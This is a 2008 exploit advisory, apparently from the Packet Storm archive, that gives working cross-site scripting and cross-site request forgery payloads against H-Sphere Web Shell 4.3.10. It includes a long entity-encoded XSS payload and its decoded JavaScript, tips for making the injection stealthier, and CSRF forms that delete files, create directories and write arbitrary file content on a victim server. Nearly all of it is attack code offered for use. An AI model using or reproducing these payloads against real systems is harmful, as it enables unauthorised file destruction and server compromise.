the last unbiased stronghold

webshell431-xssxsrf.txt

webshell431-xssxsrf.txt
Posted Oct 1, 2008
Authored by C1c4Tr1Z | Site lowsec.org

Web Shell version 4.3.10 suffers from cross site scripting and cross site request forgery vulnerabilities.

tags | exploit, web, shell, vulnerability, xss, csrf
MD5 | c89bd0bbed49467e0dd5def46832a511

webshell431-xssxsrf.txt

Change Mirror Download
#=======================================================================#
.____ _________ ._.
| | ______ _ __/ _____/ ____ ____| |
| | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ |
| |__( <_> ) / / \ ___/\ \___\|
|_______ \____/ \/\_/ /_______ /\___ >\___ >_
\/ \/ \/ \/\/
(http://www.lowsec.org)
#========================================================================#
#========================================================================#
Author: C1c4Tr1Z
Date: 28/09/08
Application: Web Shell version 4.3.10 (2006)
Product WebSite: http://www.psoft.net/HSdocumentation/sysadmin/hsphere-webshell.html
Issues:
[-]Cross-Site Scripting
[-]Cross-Site Request Forgery

Special thanks to OzX (http://www.nullbytes.net/)!

#========================================================================#
#=============================[XSS]======================================#

Proof-of-Concepts:

/actions.php?m=dload&fn=%3Ciframe/src=javascript:alert(%27XSS%27)%3E
/actions.php?m=search&start=1 [POST data: fld=%2F&mask=%3Ciframe%2Fsrc%3Djavascript%3Aalert%280%29%3E]

<!--
This piece of injection would give you the posibility to create a file (filename: "/XSS") with a simple JavaScript code.
Note: you can change the window.open() for an <iframe> to make it more stealth.
Note2: the code is decimal and hexadecimal encoded, to make a successful injection.
Note3: this script uses XMLHttpRequest() so test it on Firefox!
-->
/actions.php?m=sysinfo&tab=1'><img/src/onerror=%26%23119%26%23105%26%23116%26%23104%26%2340%26%23110%26%23101%26%23119%26%2332%26%2388%26%2377%26%2376%26%2372%26%23116%26%23116%26%23112%26%2382%26%23101%26%23113%26%23117%26%23101%26%23115%26%23116%26%2340%26%2341%26%2341%26%23123%26%2310%26%239%26%23111%26%23112%26%23101%26%23110%26%2340%26%2339%26%2371%26%2369%26%2384%26%2339%26%2344%26%2339%26%23104%26%23116%26%23116%26%23112%26%2358%26%2347%26%2347%26%2357%26%2356%26%2346%26%2349%26%2351%26%2349%26%2346%26%2349%26%2354%26%2352%26%2346%26%2353%26%2347%26%23119%26%23101%26%2398%26%23115%26%23104%26%23101%26%23108%26%23108%26%2352%26%2347%26%2397%26%2399%26%23116%26%23105%26%23111%26%23110%26%23115%26%2346%26%23112%26%23104%26%23112%26%2363%26%23109%26%2361%26%23102%26%23117%26%23116%26%23105%26%23108%26%23115%26%2338%26%2397%26%2399%26%2361%26%23109%26%23107%26%23100%26%2339%26%2344%26%23116%26%23114%26%23117%26%23101%26%2341%26%2344%26%2310%26%239%26%23115%26%23101%26%23110%26%23100%26%2340%26%23110%26%23117%26%23108%26%23108%26%2341%26%2344%26%2310%26%239%26%23111%26%23110%26%23114%26%23101%26%2397%26%23100%26%23121%26%23115%26%23116%26%2397%26%23116%26%23101%26%2399%26%23104%26%2397%26%23110%26%23103%26%23101%26%2361%26%23102%26%23117%26%23110%26%2399%26%23116%26%23105%26%23111%26%23110%26%2340%26%2341%26%23123%26%2310%26%239%26%239%26%23105%26%23102%26%2340%26%23114%26%23101%26%2397%26%23100%26%23121%26%2383%26%23116%26%2397%26%23116%26%23101%26%2361%26%2361%26%2352%26%2332%26%2338%26%2338%26%2332%26%23115%26%23116%26%2397%26%23116%26%23117%26%23115%26%2361%26%2361%26%2350%26%2348%26%2348%26%2341%26%23123%26%2310%26%239%26%239%26%239%26%23119%26%23105%26%23116%26%23104%26%2340%26%23119%26%23105%26%23110%26%23100%26%23111%26%23119%26%2346%26%23111%26%23112%26%23101%26%23110%26%2340%26%2339%26%2339%26%2344%26%2339%26%2395%26%2398%26%23108%26%2397%26%23110%26%23107%26%2339%26%2341%26%2341%26%23123%26%2310%26%239%26%239%26%239%26%239%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%23119%26%23114%26%23105%26%23116%26%23101%26%2340%26%23114%26%23101%26%23115%26%23112%26%23111%26%23110%26%23115%26%23101%26%2384%26%23101%26%23120%26%23116%26%2346%26%23114%26%23101%26%23112%26%23108%26%2397%26%2399%26%23101%26%2340%26%2347%26%2360%26%2392%26%2347%26%2398%26%23111%26%23100%26%23121%26%2362%26%2347%26%2344%26%2339%26%2360%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2362%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%23103%26%23101%26%23116%26%2369%26%23108%26%23101%26%23109%26%23101%26%23110%26%23116%26%23115%26%2366%26%23121%26%2384%26%2397%26%23103%26%2378%26%2397%26%23109%26%23101%26%2340%26%2334%26%23105%26%23110%26%23112%26%23117%26%23116%26%2334%26%2341%26%2391%26%2350%26%2393%26%2346%26%23118%26%2397%26%23108%26%23117%26%23101%26%2361%26%2334%26%2388%26%2383%26%2383%26%2334%26%2359%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%23102%26%23111%26%23114%26%23109%26%23115%26%2391%26%2348%26%2393%26%2346%26%23115%26%23117%26%2398%26%23109%26%23105%26%23116%26%2340%26%2341%26%2359%26%2360%26%2392%26%2347%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2362%26%2360%26%2347%26%2398%26%23111%26%23100%26%23121%26%2362%26%2339%26%2341%26%2341%26%2359%26%2310%26%239%26%239%26%239%26%239%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%2399%26%23108%26%23111%26%23115%26%23101%26%2340%26%2341%26%2359%26%2310%26%239%26%239%26%239%26%23125%26%2310%26%239%26%239%26%23125%26%2310%26%239%26%23125%26%2359%26%2310%26%23125>

clear js script:
----------------

with(new XMLHttpRequest()){open('GET','http://www.victim.com/actions.php?m=futils&ac=mkd',true),send(null),onreadystatechange=function(){if(readyState==4 && status==200){with(window.open('','_blank')){document.write(responseText.replace(/<\/body>/,'<script>document.getElementsByTagName("input")[2].value="XSS";document.forms[0].submit();<\/script></body>'));document.close();}}};}

#========================================================================#
#============================[CSRF]======================================#

The entire application is vulnerable to CSRF!!

Proof-of-Concepts:

<!--
Delete a file from the server.
-->
<img src="http://www.victim.com/actions.php?m=overkill&kill=1&pos=0&fn=FILENAME">


<!--
Create a directory. (Someone could test if this can lead us to XSS..)
-->
<form name='mkd' method='POST' action='http://www.victim.com/actions.php?m=futils&ac=mkd&create=1' enctype='application/x-www-form-urlencoded'>
<input type='hidden' name='do' value='yes'>
<INPUT type='text' class='text' name='dest' value="PATH">
<INPUT type='text' class='text' name='fld' value="DIR_NAME">
</form>
<script>document.forms[0].submit()</script>


<!--
Create a file with any type of content. (This is more than dangerous, this is madness..)
-->
<FORM name='editor' action='http://www.victim.com/actions.php?m=edit&save=1' method='POST' enctype='application/x-www-form-urlencoded'>
<INPUT type="hidden" name="dest">
<INPUT type='text' name='fln' value='/web_dir/FILENAME'>
<TEXTAREA name='body'>
FILE_CONTENT
</TEXTAREA>
</form>
<script>document.forms[0].submit();</script>

#========================================================================#
#========================================================================#
Contact: C1c4Tr1Z <c1c4tr1z@lowsec.org>
(http://www.lowsec.org)
LowSec! Web Application Security (Lab).
Deus ex Machina
#========================================================================#

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2012

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    37 Files
  • 2
    May 2nd
    53 Files
  • 3
    May 3rd
    33 Files
  • 4
    May 4th
    4 Files
  • 5
    May 5th
    10 Files
  • 6
    May 6th
    17 Files
  • 7
    May 7th
    19 Files
  • 8
    May 8th
    36 Files
  • 9
    May 9th
    34 Files
  • 10
    May 10th
    35 Files
  • 11
    May 11th
    20 Files
  • 12
    May 12th
    18 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    27 Files
  • 15
    May 15th
    58 Files
  • 16
    May 16th
    54 Files
  • 17
    May 17th
    25 Files
  • 18
    May 18th
    53 Files
  • 19
    May 19th
    9 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    25 Files
  • 22
    May 22nd
    32 Files
  • 23
    May 23rd
    35 Files
  • 24
    May 24th
    26 Files
  • 25
    May 25th
    25 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2012 Packet Storm. All rights reserved.

close